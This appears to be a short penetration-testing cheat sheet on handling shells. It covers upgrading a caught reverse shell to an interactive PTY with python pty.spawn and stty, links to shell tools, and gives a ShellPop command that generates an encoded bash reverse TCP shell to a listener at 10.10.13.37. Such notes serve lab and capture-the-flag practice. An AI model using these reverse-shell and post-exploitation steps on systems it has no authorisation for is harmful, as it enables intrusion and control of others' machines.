# Shells

## Upgrade to PTY

* <https://forum.hackthebox.eu/discussion/comment/22312#Comment_22312>
* <https://xakep.ru/2019/07/16/mischief/#toc05.1>
* <https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/>
* <https://infosecwriteups.com/using-tmux-for-automating-interactive-reverse-shells-630260740af3>

```bash
# Spawn PTY
$ if python3 -V > /dev/null 2>&1; then
  python3 -c 'import pty; pty.spawn("/bin/bash")'
elif python -V > /dev/null 2>&1; then
  python -c 'import pty; pty.spawn("/bin/bash")'
fi
Or
$ script -q /dev/null /bin/bash

# Background remote shell
user@remote:~$ ^Z

# Get rows and cols from local terminal
root@kali:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

# Disable local output in terminal
root@kali:~$ stty raw -echo; fg

# (optional) Reset remote terminal
user@remote:~$ reset

# Set rows and columns for proper text aligning
user@remote:~$ stty rows ${ROWS} cols ${COLS}

# For CTRL-L to work
user@remote:~$ export TERM=xterm / xterm-color / xterm-256color

# (optional) Get Bash new process image
user@remote:~$ exec /bin/bash [-l]
```

## Tools

* <http://www.jackson-t.ca/runtime-exec-payloads.html>

### ShellPop

* <https://github.com/0x00-0x00/ShellPop>

Bash reverse TCP example:

```
$ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64
```

### pwncat

* <https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/>
* <https://github.com/cytopia/pwncat>

### xxh

* <https://github.com/xxh/xxh>

```
$ pipx install xxh-xxh
$ source xxh.zsh -i id_rsa snovvcrash@192.168.1.11 +I xxh-plugin-zsh-ohmyzsh +if [+q/+vv]
$ ssh -i id_cthulhu snovvcrash@192.168.1.11 -f "rm -rf .xxh"
```